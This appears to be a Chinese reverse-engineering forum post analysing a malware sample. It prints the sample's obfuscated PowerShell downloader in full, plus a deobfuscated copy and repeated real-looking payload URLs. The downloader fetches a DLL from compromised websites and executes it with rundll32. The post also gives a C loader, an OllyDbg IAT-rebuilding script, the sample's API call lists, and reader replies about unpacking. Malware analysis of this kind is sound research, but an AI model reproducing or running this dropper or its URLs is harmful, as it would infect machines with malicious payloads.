iACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
 
$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo');   set-ITEM ("variaBle"+":l6U"+"YH"+"N")  ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); (  iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}'-F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d'));  (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s2'+')'+(('(@ht'+'t'+'ps:q'+'q)'+'(s2'))+((')('+'qq)('))+(('s2)'+'(x'))+('uan'+'thin')+('hs'+'hop')+('.'+'com')+(('qq'+')(s'+'2)('))+('ac'+'ura-')+'md'+'x'+('-snc'+'k')+(('0q'+'q)('))+(('s2)(2L'+'U7'+'w'+'qq)('+'s2)(@'+'ht'+'t'+'ps:'))+'q'+(('q)(s'+'2)(qq)'+'(s'))+(('2)'))+(('(c'))+('a'+'llto')+'re'+'p'+(('air'+'.c'+'omqq)(s'+'2)(a'))+(('ss'+'e'+'tsqq)'+'(s2'))+((')'+'(09'))+('erZ'+'FF')+'qq'+((')(s'+'2'))+((')('+'@h'))+('tt'+'p')+((':'+'qq'+')(s2)'+'(qq)'+'(s2)(se'))+('r'+'vicio'+'s')+'.'+('s'+'em')+('per'+'ti.'+'com')+(('q'+'q)'))+('(s2'+')')+(('(w'))+(('p-'+'adminqq)'+'(s2'+')('+'2'))+(('I'+'y'+'ZE7kqq'+')('))+(('s'+'2)(@'))+('ht'+'t')+('ps:'+'qq')+((')'+'(s2'))+')'+(('(q'))+(('q)(s'+'2)'+'(gia'))+('tot'+'365')+'.'+('com'+'q')+(('q)(s2'+')'))+('('+'w'+'p-conten'+'t'+'qq)(s2)')+(('(u'+'p'))+'lo'+'a'+(('d'+'sqq)('))+(('s2'+')(2'+'0'))+('20'+'qq')+((')(s'+'2'))+((')(Sx'+'qq'+')(s2)('))))."REPl`A`cE"((((('qq'+')'))+'('+(('s2'+')(')))),([array]('/'),('hw'+'e'))[0])."sPL`it"($L_hxsiu + $Pii8oen + $Ow4xjha);$N8fhtx6=(('N'+'949')+'lw'+'n');foreach ($Pgsjh8n in $Ny4mnvx | S`OrT-ob`jecT {G`ET-`RAnDom}){try{$Z1fmvqh."doWN`loAd`FiLe"($Pgsjh8n, $Tpdue32);$Z5rj4au=('Ho'+('_06y'+'i'));If ((.('Get-'+'It'+'em') $Tpdue32)."len`g`TH" -ge 30704) {&('ru'+'nd'+'ll32') $Tpdue32,'#1'."T`OStRi`Ng"();$H0_4bw3=(('S'+'dvq')+('w'+'69'));break;$Wyq13os=('S8'+'fy'+('8x'+'6'))}}catch{}}$Tuaxof9=('Se'+('d'+'90')+'_z')
$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo');   set-ITEM ("variaBle"+":l6U"+"YH"+"N")  ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); (  iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}'-F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d'));  (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s2'+')'+(('(@ht'+'t'+'ps:q'+'q)'+'(s2'))+((')('+'qq)('))+(('s2)'+'(x'))+('uan'+'thin')+('hs'+'hop')+('.'+'com')+(('qq'+')(s'+'2)('))+('ac'+'ura-')+'md'+'x'+('-snc'+'k')+(('0q'+'q)('))+(('s2)(2L'+'U7'+'w'+'qq)('+'s2)(@'+'ht'+'t'+'ps:'))+'q'+(('q)(s'+'2)(qq)'+'(s'))+(('2)'))+(('(c'))+('a'+'llto')+'re'+'p'+(('air'+'.c'+'omqq)(s'+'2)(a'))+(('ss'+'e'+'tsqq)'+'(s2'))+((')'+'(09'))+('erZ'+'FF')+'qq'+((')(s'+'2'))+((')('+'@h'))+('tt'+'p')+((':'+'qq'+')(s2)'+'(qq)'+'(s2)(se'))+('r'+'vicio'+'s')+'.'+('s'+'em')+('per'+'ti.'+'com')+(('q'+'q)'))+('(s2'+')')+(('(w'))+(('p-'+'adminqq)'+'(s2'+')('+'2'))+(('I'+'y'+'ZE7kqq'+')('))+(('s'+'2)(@'))+('ht'+'t')+('ps:'+'qq')+((')'+'(s2'))+')'+(('(q'))+(('q)(s'+'2)'+'(gia'))+('tot'+'365')+'.'+('com'+'q')+(('q)(s2'+')'))+('('+'w'+'p-conten'+'t'+'qq)(s2)')+(('(u'+'p'))+'lo'+'a'+(('d'+'sqq)('))+(('s2'+')(2'+'0'))+('20'+'qq')+((')(s'+'2'))+((')(Sx'+'qq'+')(s2)('))))."REPl`A`cE"((((('qq'+')'))+'('+(('s2'+')(')))),([array]('/'),('hw'+'e'))[0])."sPL`it"($L_hxsiu + $Pii8oen + $Ow4xjha);$N8fhtx6=(('N'+'949')+'lw'+'n');foreach ($Pgsjh8n in $Ny4mnvx | S`OrT-ob`jecT {G`ET-`RAnDom}){try{$Z1fmvqh."doWN`loAd`FiLe"($Pgsjh8n, $Tpdue32);$Z5rj4au=('Ho'+('_06y'+'i'));If ((.('Get-'+'It'+'em') $Tpdue32)."len`g`TH" -ge 30704) {&('ru'+'nd'+'ll32') $Tpdue32,'#1'."T`OStRi`Ng"();$H0_4bw3=(('S'+'dvq')+('w'+'69'));break;$Wyq13os=('S8'+'fy'+('8x'+'6'))}}catch{}}$Tuaxof9=('Se'+('d'+'90')+'_z')
$cVNgAS=System.IO.Directory;
set-item(variaBle:l6UYHN)System.Net.ServicePointManager;
$Xdz_t_i=Auz0zqx;
$Pii8oen=$B0xk04r + @ + $Val6qax;
$Lr_lqnw=Pk915wo;
(item variable:cvngas).value::"createdirectory"($home + "\y559jsv\iewfmy3\");
$M_dnbs4=Qugsyod;
(Get-iTem (variable:l6uyhn)).value::"securityprotocol" = tls12;
$X2thqmg=Jzzz62m;
$Qocy_bg=Jzzz62m;
$Zy7z7hd=Fg04ccg;
$E5pam4e=Wi08jay;
$Tpdue32=$HOME+(MRPY559jsvMRPIewfmy3MRP."RePLaCE"(('MRP'),'\'))+$Qocy_bg+('.dll');
$R6utvyl=Gprs79j;
$Z1fmvqh=System.Net.WebClient;
 
$Ny4mnvx=
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
;
 
$N8fhtx6=N949lwn;
foreach ($Pgsjh8n in $Ny4mnvx | SOrT-objecT {GET-RAnDom})
{
    try
    {
        $Z1fmvqh."doWNloAdFiLe"($Pgsjh8n, $Tpdue32);
        $Z5rj4au=Ho_06yi;
        If ((.('Get-Item') $Tpdue32)."lengTH" -ge 30704)
        {   
            &('rundll32') $Tpdue32,'#1'."TOStRiNg"();
            $H0_4bw3=Sdvqw69;
            break;
            $Wyq13os=S8fy8x6
        }
    }catch{}
}
$Tuaxof9=Sed90_z
$cVNgAS=System.IO.Directory;
set-item(variaBle:l6UYHN)System.Net.ServicePointManager;
$Xdz_t_i=Auz0zqx;
$Pii8oen=$B0xk04r + @ + $Val6qax;
$Lr_lqnw=Pk915wo;
(item variable:cvngas).value::"createdirectory"($home + "\y559jsv\iewfmy3\");
$M_dnbs4=Qugsyod;
(Get-iTem (variable:l6uyhn)).value::"securityprotocol" = tls12;
$X2thqmg=Jzzz62m;
$Qocy_bg=Jzzz62m;
$Zy7z7hd=Fg04ccg;
$E5pam4e=Wi08jay;
$Tpdue32=$HOME+(MRPY559jsvMRPIewfmy3MRP."RePLaCE"(('MRP'),'\'))+$Qocy_bg+('.dll');
$R6utvyl=Gprs79j;
$Z1fmvqh=System.Net.WebClient;
 
$Ny4mnvx=
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
;
 
$N8fhtx6=N949lwn;
foreach ($Pgsjh8n in $Ny4mnvx | SOrT-objecT {GET-RAnDom})
{
    try
    {
        $Z1fmvqh."doWNloAdFiLe"($Pgsjh8n, $Tpdue32);
        $Z5rj4au=Ho_06yi;
        If ((.('Get-Item') $Tpdue32)."lengTH" -ge 30704)
        {   
            &('rundll32') $Tpdue32,'#1'."TOStRiNg"();
            $H0_4bw3=Sdvqw69;
            break;
            $Wyq13os=S8fy8x6
        }
    }catch{}
}
$Tuaxof9=Sed90_z
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
#include <iostream>
#include<windows.h>
 
typedef int(WINAPI* fnRunDLL)();
MyRunDLL My_RunDLL;
 
int main()
{
    HMODULE hModule = LoadLibraryA("C:\\Users\\libaobao\\Y559jsv\\Iewfmy3\\Ppnq9j.dll");
    My_RunDLL = (MyRunDLL)GetProcAddress(hModule, "RunDLL");
    My_RunDLL();
    return 0;
}
#include <iostream>
#include<windows.h>
 
typedef int(WINAPI* fnRunDLL)();
MyRunDLL My_RunDLL;
 
int main()
{
    HMODULE hModule = LoadLibraryA("C:\\Users\\libaobao\\Y559jsv\\Iewfmy3\\Ppnq9j.dll");
    My_RunDLL = (MyRunDLL)GetProcAddress(hModule, "RunDLL");
    My_RunDLL();
    return 0;
}
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
// 1. 初始化变量
MOV dwGetAPIAddr, 00156135       // 1. 获取API地址的地方
MOV dwWriteAPIAddr, 01236000  // 2. 填充IAT的地方
MOV dwBreakPoint,0015B0D4                 // 3. BreakPoint
 
// 2. 初始化环境,清除所有断点,设置必要断点
BC    // 清除所有软件断点
BPHWC // 清除硬件断点
BPMC  // 清除内存断点
 
BPHWS dwGetAPIAddr, "x" //当执行到此地址时产生中断.
BPHWS dwBreakPoint, "x" //当执行到此地址时产生中断.
 
// 3. 构建循环,处理每一个分支
LOOP0:
RUN // F9
 
CMP dwGetAPIAddr,eip
JNZ case1
MOV [dwWriteAPIAddr],eax
ADD dwWriteAPIAddr,4
JMP LOOP0
case1:
CMP dwBreakPoint,eip
JNZ LOOP0
MSG "到达!"
// 1. 初始化变量
MOV dwGetAPIAddr, 00156135       // 1. 获取API地址的地方
MOV dwWriteAPIAddr, 01236000  // 2. 填充IAT的地方
MOV dwBreakPoint,0015B0D4                 // 3. BreakPoint
 
// 2. 初始化环境,清除所有断点,设置必要断点
BC    // 清除所有软件断点
BPHWC // 清除硬件断点
BPMC  // 清除内存断点
 
BPHWS dwGetAPIAddr, "x" //当执行到此地址时产生中断.
BPHWS dwBreakPoint, "x" //当执行到此地址时产生中断.
 
// 3. 构建循环,处理每一个分支
LOOP0:
RUN // F9
 
CMP dwGetAPIAddr,eip
JNZ case1
MOV [dwWriteAPIAddr],eax
ADD dwWriteAPIAddr,4
JMP LOOP0
case1:
CMP dwBreakPoint,eip
JNZ LOOP0
MSG "到达!"
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle
761C5708  shell32.SHGetFolderPathW
76EB3C26  kernel32.GetModuleFileNameW
76EAD9E8  kernel32.lstrlenW
76E98BFA  kernel32.lstrcpyW
76EB679E  kernel32.GetCommandLineW
76159EE8  shell32.CommandLineToArgvW
76EACA64  kernel32.LocalFree
76EACC56  kernel32.CreateFileW
76EA38AD  kernel32.GetFileInformationByHandleEx
76EACA7C  kernel32.CloseHandle
76EB2FDE  kernel32.GetSystemTimeAsFileTime
76E9F731  kernel32.CreateToolhelp32Snapshot
76E9FA35  kernel32.Process32FirstW
76EACAC4  kernel32.GetCurrentProcessId
76E9FACA  kernel32.Process32NextW
76EA59D7  kernel32.OpenProcess
76EA5C28  kernel32.QueryFullProcessImageNameW
7790BB71  shlwapi.PathFindFileNameW
76EB3386  kernel32.CreateEventW
76EB375D  kernel32.CreateThread
76E9EB4E  kernel32.GetTickCount64
76EABA60  kernel32.GetTickCount
76EABA90  kernel32.WaitForSingleObject
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle
761C5708  shell32.SHGetFolderPathW
76EB3C26  kernel32.GetModuleFileNameW
76EAD9E8  kernel32.lstrlenW
76E98BFA  kernel32.lstrcpyW
76EB679E  kernel32.GetCommandLineW
76159EE8  shell32.CommandLineToArgvW
76EACA64  kernel32.LocalFree
76EACC56  kernel32.CreateFileW
76EA38AD  kernel32.GetFileInformationByHandleEx
76EACA7C  kernel32.CloseHandle
76EB2FDE  kernel32.GetSystemTimeAsFileTime
76E9F731  kernel32.CreateToolhelp32Snapshot
76E9FA35  kernel32.Process32FirstW
76EACAC4  kernel32.GetCurrentProcessId
76E9FACA  kernel32.Process32NextW
76EA59D7  kernel32.OpenProcess
76EA5C28  kernel32.QueryFullProcessImageNameW
7790BB71  shlwapi.PathFindFileNameW
76EB3386  kernel32.CreateEventW
76EB375D  kernel32.CreateThread
76E9EB4E  kernel32.GetTickCount64
76EABA60  kernel32.GetTickCount
76EABA90  kernel32.WaitForSingleObject
 
 
 
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle
761C5708  shell32.SHGetFolderPathW
76EB3C26  kernel32.GetModuleFileNameW
76EAD9E8  kernel32.lstrlenW
76E98BFA  kernel32.lstrcpyW
76EB679E  kernel32.GetCommandLineW
76159EE8  shell32.CommandLineToArgvW
76EACA64  kernel32.LocalFree
76EACC56  kernel32.CreateFileW
76EA38AD  kernel32.GetFileInformationByHandleEx
76EACA7C  kernel32.CloseHandle
76EB2FDE  kernel32.GetSystemTimeAsFileTime
76E9F731  kernel32.CreateToolhelp32Snapshot
76E9FA35  kernel32.Process32FirstW
76EACAC4  kernel32.GetCurrentProcessId
76E9FACA  kernel32.Process32NextW
76EA59D7  kernel32.OpenProcess
76EA5C28  kernel32.QueryFullProcessImageNameW
7790BB71  shlwapi.PathFindFileNameW
76EB3386  kernel32.CreateEventW
76EB375D  kernel32.CreateThread
76E9EB4E  kernel32.GetTickCount64
76EABA60  kernel32.GetTickCount
775DDF14  advapi32.CryptAcquireContextW
75DDD718  crypt32.CryptDecodeObjectEx
775DC532  advapi32.CryptImportKey
775D8EE9  advapi32.CryptGenKey
775DDF4E  advapi32.CryptCreateHash
76E96BA9  kernel32.GetComputerNameA
76EA04B6  kernel32.GetWindowsDirectoryW
76EB7598  kernel32.GetVolumeInformationW
77B99A60  ntdll._snprintf
76EAA611  kernel32.lstrlenA
77B365E3  ntdll.RtlGetVersion
76E9BE77  kernel32.GetNativeSystemInfo
76EAB744  kernel32.ProcessIdToSessionId
76EB450E  kernel32.WideCharToMultiByte
77B04CC0  ntdll.memcpy
77613198  advapi32.CryptDuplicateHash
775F779B  advapi32.CryptEncrypt
775D91EA  advapi32.CryptExportKey
775DDF7E  advapi32.CryptGetHashParam
775DDF66  advapi32.CryptDestroyHash
77B03CD6  ntdll._snwprintf
77B3283D  ntdll.RtlRandomEx
75F61D76  urlmon.ObtainUserAgentString
76EB452B  kernel32.MultiByteToWideChar
77979197  wininet.InternetOpenW
7797492C  wininet.InternetConnectW
77974A42  wininet.HttpOpenRequestW
77967741  wininet.InternetSetOptionW
7797BA12  wininet.HttpSendRequestW
7796AB49  wininet.InternetCloseHandle
77975C75  wininet.HttpQueryInfoW
7796B406  wininet.InternetReadFile
77613178  advapi32.CryptDecrypt
775DC54A  advapi32.CryptVerifySignatureW
76EB53B2  kernel32.FindFirstFileW
756A1856  kernel32.VirtualAlloc
756A34D5  kernel32.CreateThread
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2021-1-5 19:08 被baobao雅编辑 ,原因: 上传样本
收藏
免费 7
支持
分享
最新回复 (4)
雪    币: 26205
活跃值: (63302)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
2
感谢分享!
2021-1-6 16:07
0
雪    币: 2747
活跃值: (1697)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
感谢分享!
2021-1-7 17:46
0
雪    币: 519
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
大佬您好,我想最近也拿到一个样本,和你的是一个家族。我想知道是怎么找到那个没有导入表的内存dll,填充IAT的地方的。就是标题3.4 观察API那里。
2022-11-1 10:16
0
雪    币: 3372
活跃值: (1470)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5
YEHONG 大佬您好,我想最近也拿到一个样本,和你的是一个家族。我想知道是怎么找到那个没有导入表的内存dll,填充IAT的地方的。就是标题3.4 观察API那里。[em_71]
在GetProcAddress 下断,然后回溯分析,静态看哪些函数调用次数比较多并且是传参有类似hash的函数,大概就是你想找的函数了
2022-11-1 10:25
0
游客
登录 | 注册 方可回帖
返回
//